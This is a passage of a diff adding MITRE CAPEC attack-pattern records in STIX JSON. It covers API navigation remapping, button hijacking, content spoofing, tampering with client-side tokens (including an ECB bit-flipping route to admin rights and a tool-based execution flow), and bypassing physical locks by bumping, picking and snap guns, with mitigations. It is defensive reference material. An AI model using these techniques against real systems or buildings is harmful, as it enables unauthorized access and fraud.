"x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle communications (CAPEC-94) between the client and server, such as a man-in-the-middle proxy." 
+ ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of links/buttons displayed to a user within API messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains links/buttons that point to an attacker controlled destination. Some applications make navigation remapping more difficult to detect because the actual HREF values of images, profile elements, and links/buttons are masked. One example would be to place an image in a user's photo gallery that when clicked upon redirected the user to an off-site location. Also, traditional web vulnerabilities (such as CSRF) can be constructed with remapped buttons or links. 
In some cases navigation remapping can be used for Phishing attacks or even means to artificially boost the page view, user site reputation, or click-fraud.", + "external_references": [ + { + "external_id": "CAPEC-386", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/386.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--9df3addd-7bea-44e5-be63-4cc46d64fbea", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Application API Navigation Remapping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--38964770-4f39-4191-89cf-73a625162b2b" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--4343b267-a4f4-4adb-aa1c-48c79c992210", + "attack-pattern--9c41b3f7-76fa-4864-9b1d-304327dcd55c" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle (CAPEC-94) communications between the client and server, such as a 
man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary manipulates either egress or ingress data from a client within an application framework in order to change the content of messages and thereby circumvent the expected application logic.", + "external_references": [ + { + "external_id": "CAPEC-387", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/387.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--4343b267-a4f4-4adb-aa1c-48c79c992210", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Navigation Remapping To Propagate Malicious Content", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9df3addd-7bea-44e5-be63-4cc46d64fbea" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n Performing this attack allows the adversary to manipulate content in 
such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the adversarys' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the adversarys' intent. When the goal is to spread malware, deceptive content is created such as modified links, buttons, or images, that entice users to click on those items, all of which point to a malicious URI. The techniques require use of specialized software that allow the adversary to use adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system in order to change the destination of various application interface elements.\n ", + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle communications between the client and server, such as a man-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the destination and/or content of buttons displayed to a user within API messages. 
Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that looks authentic but contains buttons that point to an attacker controlled destination.", + "external_references": [ + { + "external_id": "CAPEC-388", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/388.html" + }, + { + "external_id": "CWE-471", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/471.html" + }, + { + "external_id": "CWE-345", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/345.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-311", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--9c41b3f7-76fa-4864-9b1d-304327dcd55c", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Application API Button Hijacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9df3addd-7bea-44e5-be63-4cc46d64fbea" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n An in-game event occurs and the attacker traps the result, which turns out to be a form that will be populated to their primary profile. 
The attacker, using a MITM proxy, observes the following data:\n [Button][Claim_Item]Sourdough_Cookie[URL_IMG]foo[/URL_IMG][Claim_Link]bar[/Claim_Link]\n By altering the destination of \"Claim_Link\" to point to the attackers' server an unwitting victim can be enticed to click the link. Another example would be for the attacker to rewrite the button destinations for an event so that clicking \"Yes\" or \"No\" causes the user to load the attackers' code.\n " + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle (CAPEC-94) communications between the client and server, such as a adversary-in-the-middle (CAPEC-94) proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker manipulates either egress or ingress data from a client within an application framework in order to change the content of messages. Performing this attack allows the attacker to manipulate content in such a way as to produce messages or content that look authentic but may contain deceptive links, spam-like content, or links to the attackers' code. In general, content-spoofing within an application API can be employed to stage many different types of attacks varied based on the attackers' intent. 
The techniques require use of specialized software that allow the attacker to use adversary-in-the-middle (CAPEC-94) communications between the web browser and the remote system.", + "external_references": [ + { + "external_id": "CAPEC-389", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/389.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--33370ee8-a290-42cc-b85d-5fd13f1f6fed", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Content Spoofing Via Application API Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ea07b1ea-c1b0-4923-8d25-a8fc39da040a" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "Targeted software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "A software program that allows the use of adversary-in-the-middle communications between the client and server, such as an adversary-in-the-middle proxy." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In circumstances where an application holds important data client-side in tokens (cookies, URLs, data files, and so forth) that data can be manipulated. 
If client or server-side application components reinterpret that data as authentication tokens or data (such as store item pricing or wallet information) then even opaquely manipulating that data may bear fruit for an Attacker. In this pattern an attacker undermines the assumption that client side tokens have been adequately protected from tampering through use of encryption or obfuscation.", + "external_references": [ + { + "external_id": "CAPEC-39", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/39.html" + }, + { + "external_id": "CWE-353", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/353.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-472", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/472.html" + }, + { + "external_id": "CWE-565", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/565.html" + }, + { + "external_id": "CWE-315", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/315.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-233", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/233.html" + } + ], + "id": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Manipulating Opaque Client-based Data Tokens", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + 
"attack-pattern--1fa1539d-4a13-4453-bf43-ad0987b2fbf5" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "With certain price watching websites, that aggregate products available prices, the user can buy items through whichever vendors has product availability, the best price, or other differentiator. Once a user selects an item, the site must broker the purchase of that item with the vendor. Because vendors sell the same product through different channel partners at different prices, token exchange between price watching sites and selling vendors will often contain pricing information. With some price watching sites, manipulating URL-data (which is encrypted) even opaquely yields different prices charged by the fulfilling vendor. If the manipulated price turns out higher, the Attacker can cancel purchase. If the Attacker succeeded in manipulating the token and creating a lower price, they proceed.", + "Upon successful authentication user is granted an encrypted authentication cookie by the server and it is stored on the client. One piece of information stored in the authentication cookie reflects the access level of the user (e.g. \"u\" for user). The authentication cookie is encrypted using the Electronic Code Book (ECB) mode, that naively encrypts each of the plaintext blocks to each of the ciphertext blocks separately. An attacker knows the structure of the cookie and can figure out what bits (encrypted) store the information relating to the access level of the user. An attacker modifies the authentication cookie and effectively substitutes \"u\" for \"a\" by flipping some of the corresponding bits of ciphertext (trial and error). 
Once the correct \"flip\" is found, when the system is accessed, the attacker is granted administrative privileges in the system. Note that in this case an attacker did not have to figure out the exact encryption algorithm or find the secret key, but merely exploit the weakness inherent in using the ECB encryption mode.", + "Archangel Weblog 0.90.02 allows remote attackers to bypass authentication by setting the ba_admin cookie to 1. See also: CVE-2006-0944" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Enumerate information passed to client side: The attacker identifies the parameters used as part of tokens to take business or security decisions

  2. Techniques
    Use WebScarab to reveal hidden fields while browsing.
    Use a sniffer to capture packets
    View source of web page to find hidden fields
    Examine URL to see if any opaque tokens are in it
    Disassemble or decompile client-side application
    Use debugging tools such as File Monitor, Registry Monitor, Debuggers, etc.
  3. Determine protection mechanism for opaque token: The attacker determines the protection mechanism used to protect the confidentiality and integrity of these data tokens. They may be obfuscated or a full blown encryption may be used.

  4. Techniques
    Look for signs of well-known character encodings
    Look for cryptographic signatures
    Look for delimiters or other indicators of structure

Experiment

  1. Modify parameter/token values: Trying each parameter in turn, the attacker modifies the values

  2. Techniques
    Modify tokens logically
    Modify tokens arithmetically
    Modify tokens bitwise
    Modify structural components of tokens
    Modify order of parameters/tokens
  3. Cycle through values for each parameter.: Depending on the nature of the application, the attacker now cycles through values of each parameter and observes the effects of this modification in the data returned by the server

  4. Techniques
    Use network-level packet injection tools such as netcat
    Use application-level data modification tools such as Tamper Data, WebScarab, TamperIE, etc.
    Use modified client (modified by reverse engineering)
    Use debugging tools to modify data in client
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--cddb7bce-8d94-4eea-8e73-9f6ef66376c2" + ], + "x_capec_prerequisites": [ + "An attacker already has some access to the system or can steal the client based data tokens from another user who has access to the system.", + "For an Attacker to viably execute this attack, some data (later interpreted by the application) must be held client-side in a way that can be manipulated without detection. This means that the data or tokens are not CRCd as part of their value or through a separate meta-data store elsewhere." + ], + "x_capec_resources_required": [ + "The Attacker needs no special hardware-based resources in order to conduct this attack. Software plugins, such as Tamper Data for Firefox, may help in manipulating URL- or cookie-based data." + ], + "x_capec_skills_required": { + "High": "If the client site token is encrypted.", + "Medium": "If the client site token is obfuscated." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "One solution to this problem is to protect encrypted data with a CRC of some sort. If knowing who last manipulated the data is important, then using a cryptographic \"message authentication code\" (or hMAC) is prescribed. However, this guidance is not a panacea. In particular, any value created by (and therefore encrypted by) the client, which itself is a \"malicious\" value, all the protective cryptography in the world can't make the value 'correct' again. 
Put simply, if the client has control over the whole process of generating and encoding the value, then simply protecting its integrity doesn't help.", + "id": "course-of-action--e9607fbe-044b-4d09-8ead-802f3f085108", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--67d47bb8-367b-4568-834c-70ed30ce08cc", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--e9607fbe-044b-4d09-8ead-802f3f085108", + "target_ref": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure to protect client side authentication tokens for confidentiality (encryption) and integrity (signed hash)", + "id": "course-of-action--c9f9e9db-5633-4696-b4dc-e6082a1ccb15", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b6318059-55e6-4b00-9821-0eae3425f8df", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c9f9e9db-5633-4696-b4dc-e6082a1ccb15", + "target_ref": 
"attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Make sure that all session tokens use a good source of randomness", + "id": "course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38c91dac-0db3-40f7-ab37-2d092382b5ca", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--08eae113-ec2a-445c-afca-ffe3b526e605", + "target_ref": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Perform validation on the server side to make sure that client side data tokens are consistent with what is expected.", + "id": "course-of-action--85ac4180-1e64-45ea-a569-f9e826426ae8", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-39-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2f0a0801-67e1-4043-87bf-b630a49aa8a8", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + 
], + "relationship_type": "mitigates", + "source_ref": "course-of-action--85ac4180-1e64-45ea-a569-f9e826426ae8", + "target_ref": "attack-pattern--9afead03-280c-4f2c-82f6-b08b7a54a8e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Facilities often used layered models for physical security such as traditional locks, Electronic-based card entry systems, coupled with physical alarms. Hardware security mechanisms range from the use of computer case and cable locks as well as RFID tags for tracking computer assets. This layered approach makes it difficult for random physical security breaches to go unnoticed, but is less effective at stopping deliberate and carefully planned break-ins. Avoiding detection begins with evading building security and surveillance and methods for bypassing the electronic or physical locks which secure entry points.", + "external_references": [ + { + "external_id": "CAPEC-390", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/390.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--8ba08815-66fb-4150-a7fa-8ab6d1472b5f", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Bypassing Physical Security", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97", + "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + 
"created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses techniques and methods to bypass physical security measures of a building or facility. Physical locks may range from traditional lock and key mechanisms, cable locks used to secure laptops or servers, locks on server cases, or other such devices. Techniques such as lock bumping, lock forcing via snap guns, or lock picking can be employed to bypass those locks and gain access to the facilities or devices they protect, although stealth, evidence of tampering, and the integrity of the lock following an attack, are considerations that may determine the method employed. Physical locks are limited by the complexity of the locking mechanism. While some locks may offer protections such as shock resistant foam to prevent bumping or lock forcing methods, many commonly employed locks offer no such countermeasures.", + "external_references": [ + { + "external_id": "CAPEC-391", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/391.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Bypassing Physical Locks", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8ba08815-66fb-4150-a7fa-8ab6d1472b5f" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--4068bee0-b331-49e8-872e-98429a3c374a", + "attack-pattern--9996317e-313b-456c-8bc8-491dbb53b368", + "attack-pattern--aea87f07-9619-4bc5-9790-01bf3423c494" + ], + "x_capec_status": "Draft", + 
"x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses a bump key to force a lock on a building or facility and gain entry. Lock Bumping is the use of a special type of key that can be tapped or bumped to cause the pins within the lock to fall into temporary alignment, allowing the lock to be opened. Lock bumping allows an attacker to open a lock without having the correct key. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A bump key is a specially constructed key that exploits this design. When the bump key is struck or firmly tapped, its teeth transfer the force of the tap into the key pins, causing the lock to momentarily shift into proper alignment for the mechanism to be opened.", + "external_references": [ + { + "external_id": "CAPEC-392", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/392.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--4068bee0-b331-49e8-872e-98429a3c374a", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Lock Bumping", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": 
"2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses lock picking tools and techniques to bypass the locks on a building or facility. Lock picking is the use of a special set of tools to manipulate the pins within a lock. Different sets of tools are required for each type of lock. Lock picking attacks have the advantage of being non-invasive in that if performed correctly the lock will not be damaged. A standard lock pin-and-tumbler lock is secured by a set of internal pins that prevent the tumbler device from turning. Spring loaded driver pins push down on the key pins preventing rotation so that the bolt remains in a locked position.. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. Most common locks, such as domestic locks in the US, can be picked using a standard 2 tools (i.e. a torsion wrench and a hook pick).", + "external_references": [ + { + "external_id": "CAPEC-393", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/393.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--9996317e-313b-456c-8bc8-491dbb53b368", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Lock Picking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": 
"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker uses a Snap Gun, also known as a Pick Gun, to force the lock on a building or facility. A Pick Gun is a special type of lock picking instrument that works on similar principles as lock bumping. A snap gun is a hand-held device with an attached metal pick. The metal pick strikes the pins within the lock, transferring motion from the key pins to the driver pins and forcing the lock into momentary alignment. A standard lock is secured by a set of internal pins that prevent the device from turning. Spring loaded driver pins push down on the key pins. When the correct key is inserted, the ridges on the key push the key pins up and against the driver pins, causing correct alignment which allows the lock cylinder to rotate. A Snap Gun exploits this design by using a metal pin to strike all of the key pins at once, forcing the driver pins to shift into an unlocked position. Unlike bump keys or lock picks, a Snap Gun may damage the lock more easily, leaving evidence that the lock has been tampered with.", + "external_references": [ + { + "external_id": "CAPEC-394", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/394.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--aea87f07-9619-4bc5-9790-01bf3423c494", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Using a Snap Gun Lock to Force a Lock", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--00c93895-c68e-4d27-a1ec-0dddce68ed97" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + 
"created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker exploits security assumptions to bypass electronic locks or other forms of access controls. Most attacks against electronic access controls follow similar methods but utilize different tools. Some electronic locks utilize magnetic strip cards, others employ RFID tags embedded within a card or badge, or may involve more sophisticated protections such as voice-print, thumb-print, or retinal biometrics. Magnetic Strip and RFID technologies are the most widespread because they are cost effective to deploy and more easily integrated with other electronic security measures. These technologies share common weaknesses that an attacker can exploit to gain access to a facility protected by the mechanisms via copying legitimate cards or badges, or generating new cards using reverse-engineered algorithms.", + "external_references": [ + { + "external_id": "CAPEC-395", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/395.html" + }, + { + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--5e808864-44b1-478c-8cb0-75c55cd51e2b", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Bypassing Electronic Locks and Access Controls", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--8ba08815-66fb-4150-a7fa-8ab6d1472b5f" + ], + "x_capec_domains": [ + "Physical Security" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--19015961-475c-438b-887b-e3d66a9143de", + "attack-pattern--65737f80-588a-449a-af08-0508486d9481", + "attack-pattern--ca237733-be3e-4d9c-85a0-d18cb1c8295d", 
